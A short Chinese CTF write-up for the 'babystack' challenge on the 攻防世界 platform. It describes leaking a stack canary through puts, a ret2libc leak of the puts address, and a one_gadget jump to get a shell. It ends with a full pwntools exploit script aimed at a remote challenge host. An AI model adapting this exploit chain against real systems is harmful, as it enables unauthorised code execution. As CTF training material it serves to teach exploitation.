2019.10.16 babystack 攻防世界

我们先检查一下程序的开了哪些保护机制。



v8就是那个标志canary，程序有个输出puts()，有read(),并且read()有一个非常明显的溢出(s的大小只有0x90，但是read读取了0x100大小的数据)

我们用one_gadget libc文件名来查找one_gadget。
①这道题主要是绕过canary，然后栈溢出getshell。
②经分析，read函数读入到s处，可以溢出。
③put函数输出s的内容，遇到’\x00’才停止，即使字符串中存在’\n’,也会继续输出，用来泄露canary的值。
④泄露出canary的值后，通过read函数溢出，泄露出read函数地址，得到libc基址。
⑤用onegadget直接找到execve的地址，再次溢出，跳转到此地址获得shell。

这里和平常有点不一样的就是我们需要退出（即 3）才能执行栈中的内容。

我们最后把exp：

#!/usr/bin/env python
from pwn import *
elf=ELF(’./babystack’)
libc=ELF(’./libc-2.23.so’)
p=remote(‘111.198.29.45’,52070)
prdi_addr=0x0400a93
main_addr=0x0400908
one_gadget_addr=0x45216
put_plt=elf.plt[‘puts’]
put_got=elf.got[‘puts’]
p.sendlineafter(’>> ‘,‘1’)
p.sendline(‘a’*0x88)
p.sendlineafter(’>> ‘,‘2’)
p.recvuntil(‘a’*0x88+’\n’)
canary=u64(p.recv(7).rjust(8,’\x00’))
print hex(canary)
p.sendlineafter(’>> ‘,‘1’)
payload=‘a’*0x88+p64(canary)+‘a’*8+p64(prdi_addr)+p64(put_got)+p64(put_plt)+p64(main_addr)
p.sendline(payload)
p.recv()
p.sendlineafter(’>> ‘,‘3’)
put_addr=u64(p.recv(8).ljust(8,’\x00’))
print hex(put_addr)
libc_base=put_addr-libc.symbols[‘puts’]
flag=libc_base+one_gadget_addr
p.sendlineafter(’>> ‘,‘1’)
payload1=‘a’*0x88+p64(canary)+‘a’*8+p64(flag)
p.sendline(payload1)
p.sendlineafter(’>> ',‘3’)
p.interactive()